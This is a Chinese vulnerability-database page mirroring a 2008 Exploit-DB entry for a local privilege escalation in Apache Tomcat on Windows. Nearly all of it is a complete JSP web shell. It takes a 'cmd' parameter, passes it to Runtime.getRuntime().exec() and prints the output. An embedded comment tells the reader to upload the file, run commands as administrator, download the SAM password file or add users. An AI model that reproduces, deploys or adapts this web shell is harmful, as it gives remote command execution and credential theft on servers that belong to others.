Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Local Privilege Escalation

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056993 漏洞类型
发布时间 2008-11-28 更新时间 2008-11-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7264
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<%@ page import="java.util.*,java.io.*"%>
<%
%>
 
<%--
abysssec inc public material
 
just upload this file with abysssec.jsp and execute your command
your command will run as administrator . you can download sam file
add user or do anything you want .
note : please be gentle and don't obstructionism .
vulnerability discovered by : abysssec.com
 
 --%>
<HTML><BODY bgcolor=#0000000 and text=#DO0000>
<title> Abysssec inc (abysssec.com) JSP vulnerability </tile>
<center><h3>JSP Privilege Escalation Vulnerability PoC</center></h3>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Execute !">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

# milw0rm.com [2008-11-28]